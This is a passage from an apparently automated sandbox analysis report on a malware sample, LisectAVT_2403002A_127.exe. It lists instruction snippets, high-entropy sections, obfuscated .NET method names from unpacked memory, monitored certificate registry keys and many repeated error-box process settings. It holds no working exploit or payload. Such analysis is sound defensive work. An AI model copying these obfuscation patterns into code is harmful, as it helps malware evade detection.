                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 0_2_0172F4F8 pushfd ; iretd 0_2_0172F4F9
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CB2C61 push 3006DAC9h; iretd 3_2_06CB2C6D
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeCode function: 3_2_06CBBB80 push es; ret 3_2_06CBBB90
                      Source: LisectAVT_2403002A_127.exeStatic PE information: section name: .text entropy: 7.915103665911927
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, md1b4YpvsopcyTG0K9.csHigh entropy of concatenated method names: 'e9XetV0sq', 'O6i1U5xFi', 'XXOEanaRY', 'xPe3F6cs5', 'NP8ZiDEjS', 'EBWaYJrL8', 'fWV07D8Ze4EXaq5gmH', 'sNjZ5KaJOMypsC6u6V', 'r5DSvC5cP', 'qQayyahym'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, uhdXDir4lKqJA5L4Sp.csHigh entropy of concatenated method names: 'A7vMT4BgEO', 'vhxMGLB6k6', 'NteMxIB5ws', 'bfVM5mkOfU', 'GEyMkRRgUu', 'XJuMCFnZbR', 'v45MBvlXIE', 'lIsMPcMPFj', 'zpxM4CZTdk', 'r7uMwwUZfF'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, klmAZ8HTeMLVuJRsAH.csHigh entropy of concatenated method names: 'Xy1xKSBOe2', 'kcNxHXalOR', 'NLNxLdeeye', 'S1jxpsgdBe', 'fkIxqgDaW2', 'QDgxjnFsaY', 'V4MxQCKLBJ', 'pW5xX3SiNJ', 'Nigxm041ZV', 'v7AxVnoIRU'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, Odwx2LjYANljE05Rb8.csHigh entropy of concatenated method names: 'ToString', 'kXot9FUpm4', 'nbqtDL6yee', 'wIrt2EsOiT', 'RVptY1LD9G', 'BOGtoRkIWh', 'nMetssyPBT', 'kP3tUBwjvH', 'DBEtc3qCi1', 'ko6tNUjGFH'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, AX1Xgv4D1Q2EKuupqj.csHigh entropy of concatenated method names: 'Ai3Fb0VorA', 'WOVFZ8Jmxb', 'CSOFJtkspK', 'CC1FDPYNUc', 'himFYoux7j', 'BF5FotB6mC', 'Jg4FUTi5J7', 'EfkFcXxG2w', 'QEGF8d2k5f', 'ewXF9caTmx'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, sWdKaCOIM2sgOvHeej.csHigh entropy of concatenated method names: 'b0XBf5k8oN', 'DsCBRXWdoS', 'pG8BemC6Xd', 'iufB1oCKtI', 'ro3BO3sl8j', 'PI1BEiWtCR', 'AJVB30SnKp', 'LFNBbYGE9o', 'PQ7BZiMH6g', 'drCBaat4a0'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, pWNYPZ5V9av2f1UrTvd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zlFyKislS5', 'W7uyHQxOwY', 'udayLkexRT', 'eCOypfnF7t', 'DO1yqYFbML', 'CUMyjZ8X8R', 'fFhyQ8KDkG'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, wMJB2RQRit9u0tKky6.csHigh entropy of concatenated method names: 'xxTIwDVOTD', 'D4IIrdvact', 'ToString', 'LCQIGPjEU7', 'RTwIxfMai0', 'cZgI5CsuGI', 'KbAIkGviec', 'WAWIC7guxt', 'YivIBoQHlq', 'kBxIPE47H9'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, ftvGXn5aX1cl3NfwNG9.csHigh entropy of concatenated method names: 'gkk6f3VFlx', 'zbd6RNQBTX', 'Sbh6exKZgY', 'BPn617MX6h', 'mjb6O1UUsD', 'Oab6EkdgUL', 'eta63XKAAN', 'jo66bfyjyu', 'm5u6ZMX6NR', 'e426aa48U6'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, iaZwSv7NUZ7lnset1d.csHigh entropy of concatenated method names: 'morCTbZ37O', 'nvwCxJgxeq', 'uovCkuI2Dc', 'PgJCBmcl7a', 'EEJCPGDXKk', 'u2OkqZGrpM', 'nxakjt8g4f', 'GivkQMoYBc', 'oajkXhnsCN', 'MJckmZBgOg'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, Cro2EFbkj2fvPZbku3.csHigh entropy of concatenated method names: 'vnl6uj0Wu4', 'vxl6MZZoj7', 'gMm67Dnuyd', 'NbU6G9ZpKS', 'D156xFOCsB', 'fBr6kQJFQT', 'XoF6CvvlEU', 'O7ESQZWOst', 'jPeSXj6KXl', 'Gc3SmUI2fH'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, kR6xFVcWjByQkEUqC9.csHigh entropy of concatenated method names: 'Dispose', 'PNxumD58lP', 'rmChD72DZm', 'KTHddUYMU3', 'GDCuV5YNgN', 'xoXuzXEfed', 'ProcessDialogKey', 'FBIhvfVLhw', 'w61hu2dTS1', 'FZqhhSwIkh'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, ajUyEO0gYae1kdByrk.csHigh entropy of concatenated method names: 'U5pIXQYXC5', 'm3SIVrrGRZ', 'EiLSvZJZoX', 'LI8SuLHTaE', 'DWWI9kdOEM', 'A6wIib3TkX', 'EQ6In2EBrL', 'r5fIKpiEHP', 'DERIHvrney', 'e08ILEML5p'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, mcP8dfxCsy0XIot8V2.csHigh entropy of concatenated method names: 'KdR51LjgZq', 'DyD5EDefN0', 'UXC5bDqeFl', 'DiX5ZgAmde', 'fqe5gJ5oAg', 'PRS5tC4QlC', 'Gqk5IoXpHu', 'X3Q5SbwIEA', 'Vob56v3OnS', 'jZa5ynRhZC'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, erqSUTsy0FA1KhqLIs.csHigh entropy of concatenated method names: 'pEQuBkUejR', 'VBPuP0JLvt', 'vwjuwLv0y1', 'RHourNLG43', 'sTjugV521J', 'T07utB3lao', 'RItiAfCBvB5x6h7b5a', 'Nw9PSvAv655kLoFC4J', 'NJVFWi7LBvbvj7Z3Bu', 'kruuuxuqkh'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, OoFyZfoyccIPM6eUm3.csHigh entropy of concatenated method names: 'DJpSG05kw7', 'A6gSx4vgYy', 'k3TS5lAbbm', 'tXVSkXvI8X', 'tsZSCvym87', 'RVkSBX8367', 'Le3SPY1Ffm', 'UgLS485LXE', 'lwlSwm1Vj2', 'E9eSrl0NCk'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, W2xqs255xweGuk9IvRb.csHigh entropy of concatenated method names: 'ToString', 'LfOyMiVwAd', 'buPy7bvvAd', 'MIIyTCh6Ls', 'Q1XyGTmcTm', 'w3fyxbZQxq', 'wlAy5318VN', 'knhykJUyQV', 'Pwkoa3jai4QaaQF4vGg', 'HNkQMGjbjWh4TEenjmJ'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, kdFuKdGJyNY9AlcONn.csHigh entropy of concatenated method names: 'UA1g8fJH8V', 'a4wgijuDJx', 'v50gK0G6Up', 'w4DgHFunli', 'eFxgD9LyN1', 'K0dg2A78nN', 'vGJgYkmwrk', 'fb7goxEf84', 'WPdgsAoLhO', 're9gUfpgjY'
                      Source: 0.2.LisectAVT_2403002A_127.exe.7c80000.8.raw.unpack, rYxoLNI0oTSuT0iyWI.csHigh entropy of concatenated method names: 'dDsBGWkORU', 'cq2B5brhxX', 'yTRBCMwHLe', 'sOWCVDovrm', 'rYmCz1jVn1', 'ElKBvE8gfY', 'zH9BuAAfbA', 'rxXBhEbWam', 'pZvBMg7FAJ', 'LqGB7Dv5tp'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, md1b4YpvsopcyTG0K9.csHigh entropy of concatenated method names: 'e9XetV0sq', 'O6i1U5xFi', 'XXOEanaRY', 'xPe3F6cs5', 'NP8ZiDEjS', 'EBWaYJrL8', 'fWV07D8Ze4EXaq5gmH', 'sNjZ5KaJOMypsC6u6V', 'r5DSvC5cP', 'qQayyahym'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, uhdXDir4lKqJA5L4Sp.csHigh entropy of concatenated method names: 'A7vMT4BgEO', 'vhxMGLB6k6', 'NteMxIB5ws', 'bfVM5mkOfU', 'GEyMkRRgUu', 'XJuMCFnZbR', 'v45MBvlXIE', 'lIsMPcMPFj', 'zpxM4CZTdk', 'r7uMwwUZfF'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, klmAZ8HTeMLVuJRsAH.csHigh entropy of concatenated method names: 'Xy1xKSBOe2', 'kcNxHXalOR', 'NLNxLdeeye', 'S1jxpsgdBe', 'fkIxqgDaW2', 'QDgxjnFsaY', 'V4MxQCKLBJ', 'pW5xX3SiNJ', 'Nigxm041ZV', 'v7AxVnoIRU'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, Odwx2LjYANljE05Rb8.csHigh entropy of concatenated method names: 'ToString', 'kXot9FUpm4', 'nbqtDL6yee', 'wIrt2EsOiT', 'RVptY1LD9G', 'BOGtoRkIWh', 'nMetssyPBT', 'kP3tUBwjvH', 'DBEtc3qCi1', 'ko6tNUjGFH'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, AX1Xgv4D1Q2EKuupqj.csHigh entropy of concatenated method names: 'Ai3Fb0VorA', 'WOVFZ8Jmxb', 'CSOFJtkspK', 'CC1FDPYNUc', 'himFYoux7j', 'BF5FotB6mC', 'Jg4FUTi5J7', 'EfkFcXxG2w', 'QEGF8d2k5f', 'ewXF9caTmx'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, sWdKaCOIM2sgOvHeej.csHigh entropy of concatenated method names: 'b0XBf5k8oN', 'DsCBRXWdoS', 'pG8BemC6Xd', 'iufB1oCKtI', 'ro3BO3sl8j', 'PI1BEiWtCR', 'AJVB30SnKp', 'LFNBbYGE9o', 'PQ7BZiMH6g', 'drCBaat4a0'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, pWNYPZ5V9av2f1UrTvd.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zlFyKislS5', 'W7uyHQxOwY', 'udayLkexRT', 'eCOypfnF7t', 'DO1yqYFbML', 'CUMyjZ8X8R', 'fFhyQ8KDkG'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, wMJB2RQRit9u0tKky6.csHigh entropy of concatenated method names: 'xxTIwDVOTD', 'D4IIrdvact', 'ToString', 'LCQIGPjEU7', 'RTwIxfMai0', 'cZgI5CsuGI', 'KbAIkGviec', 'WAWIC7guxt', 'YivIBoQHlq', 'kBxIPE47H9'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, ftvGXn5aX1cl3NfwNG9.csHigh entropy of concatenated method names: 'gkk6f3VFlx', 'zbd6RNQBTX', 'Sbh6exKZgY', 'BPn617MX6h', 'mjb6O1UUsD', 'Oab6EkdgUL', 'eta63XKAAN', 'jo66bfyjyu', 'm5u6ZMX6NR', 'e426aa48U6'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, iaZwSv7NUZ7lnset1d.csHigh entropy of concatenated method names: 'morCTbZ37O', 'nvwCxJgxeq', 'uovCkuI2Dc', 'PgJCBmcl7a', 'EEJCPGDXKk', 'u2OkqZGrpM', 'nxakjt8g4f', 'GivkQMoYBc', 'oajkXhnsCN', 'MJckmZBgOg'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, Cro2EFbkj2fvPZbku3.csHigh entropy of concatenated method names: 'vnl6uj0Wu4', 'vxl6MZZoj7', 'gMm67Dnuyd', 'NbU6G9ZpKS', 'D156xFOCsB', 'fBr6kQJFQT', 'XoF6CvvlEU', 'O7ESQZWOst', 'jPeSXj6KXl', 'Gc3SmUI2fH'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, kR6xFVcWjByQkEUqC9.csHigh entropy of concatenated method names: 'Dispose', 'PNxumD58lP', 'rmChD72DZm', 'KTHddUYMU3', 'GDCuV5YNgN', 'xoXuzXEfed', 'ProcessDialogKey', 'FBIhvfVLhw', 'w61hu2dTS1', 'FZqhhSwIkh'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, ajUyEO0gYae1kdByrk.csHigh entropy of concatenated method names: 'U5pIXQYXC5', 'm3SIVrrGRZ', 'EiLSvZJZoX', 'LI8SuLHTaE', 'DWWI9kdOEM', 'A6wIib3TkX', 'EQ6In2EBrL', 'r5fIKpiEHP', 'DERIHvrney', 'e08ILEML5p'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, mcP8dfxCsy0XIot8V2.csHigh entropy of concatenated method names: 'KdR51LjgZq', 'DyD5EDefN0', 'UXC5bDqeFl', 'DiX5ZgAmde', 'fqe5gJ5oAg', 'PRS5tC4QlC', 'Gqk5IoXpHu', 'X3Q5SbwIEA', 'Vob56v3OnS', 'jZa5ynRhZC'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, erqSUTsy0FA1KhqLIs.csHigh entropy of concatenated method names: 'pEQuBkUejR', 'VBPuP0JLvt', 'vwjuwLv0y1', 'RHourNLG43', 'sTjugV521J', 'T07utB3lao', 'RItiAfCBvB5x6h7b5a', 'Nw9PSvAv655kLoFC4J', 'NJVFWi7LBvbvj7Z3Bu', 'kruuuxuqkh'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, OoFyZfoyccIPM6eUm3.csHigh entropy of concatenated method names: 'DJpSG05kw7', 'A6gSx4vgYy', 'k3TS5lAbbm', 'tXVSkXvI8X', 'tsZSCvym87', 'RVkSBX8367', 'Le3SPY1Ffm', 'UgLS485LXE', 'lwlSwm1Vj2', 'E9eSrl0NCk'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, W2xqs255xweGuk9IvRb.csHigh entropy of concatenated method names: 'ToString', 'LfOyMiVwAd', 'buPy7bvvAd', 'MIIyTCh6Ls', 'Q1XyGTmcTm', 'w3fyxbZQxq', 'wlAy5318VN', 'knhykJUyQV', 'Pwkoa3jai4QaaQF4vGg', 'HNkQMGjbjWh4TEenjmJ'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, kdFuKdGJyNY9AlcONn.csHigh entropy of concatenated method names: 'UA1g8fJH8V', 'a4wgijuDJx', 'v50gK0G6Up', 'w4DgHFunli', 'eFxgD9LyN1', 'K0dg2A78nN', 'vGJgYkmwrk', 'fb7goxEf84', 'WPdgsAoLhO', 're9gUfpgjY'
                      Source: 0.2.LisectAVT_2403002A_127.exe.4334350.3.raw.unpack, rYxoLNI0oTSuT0iyWI.csHigh entropy of concatenated method names: 'dDsBGWkORU', 'cq2B5brhxX', 'yTRBCMwHLe', 'sOWCVDovrm', 'rYmCz1jVn1', 'ElKBvE8gfY', 'zH9BuAAfbA', 'rxXBhEbWam', 'pZvBMg7FAJ', 'LqGB7Dv5tp'
                      Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                      Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                      Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                      Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                      Source: 0.2.LisectAVT_2403002A_127.exe.57e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                      Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, kdFvaMFVPKs73pA7Ae.csHigh entropy of concatenated method names: 'jlLbsIppcp4pe', 'HUDVafGQx3A5lYPXEbC', 'bWxlDPGFKtjOUjq8ME9', 'J13JY7Gs9VegMR0Usdn', 'gjnvHYGCPTFBSN5sXDA', 'UXn9pRGVr5JYGFjuCRJ', 'g8bQ3yGYPoLwrRusK3E', 'KwwAwLG5jtFVjgr5V0l', 'lJyLiGG0wAjthymuVo5', 'KrHGd2G9wj507LdZGDe'
                      Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, DD.csHigh entropy of concatenated method names: 'wgRxinKHcbWANUbFNm', 'dwveif1E9jqp4XTbTA', 'iYTXHL2SDoNZBJVsGw', 'hFySdn3keDBvJSvKal', 'PVIytPpWpuEYQLk40u'
                      Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, ihWImL1h2qjtIkVYDh.csHigh entropy of concatenated method names: 'qJUttacKFT', 'djwp7oGHZ8xfNf3m5ut', 'AZqALCG67UykKuowXP2', 'dkLCJpGlCfFdqtD7Epf', 'iHWSkAGjDuGN31hXJsT', 'u4UYnDGE5xCOMnt15QR', 'jhES7Va4c', 'jWmROKkjL', 'Dispose', 'BJj7gBhfp'
                      Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, oImfMJtvGUo8fMQNBQ.csHigh entropy of concatenated method names: 'cxsORewNJ', 'VvrninWuk', 'ustvIxt9o', 'QtXoY7g0N', 'cMKlMbnQu', 'w2KLAB5Xx', 'hNkF6TG2YCh7xU8s3hJ', 'hs4l1PGKtLhAeRnm1c4', 'Dispose', 'MoveNext'
                      Source: 0.2.LisectAVT_2403002A_127.exe.2f75dd4.2.raw.unpack, wehuuoKhMKMbnQu72K.csHigh entropy of concatenated method names: 'NXMyxc8eI', 'GTZadPHeP', 'DEVNaDCj9', 'cflmBNqev', 'VFQ0OImLC', 'PbYVMxZvt', 'UPdFjbLed', 'AeEi93ui9', 'oM66buTLn', 'nxFUIfcfn'
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
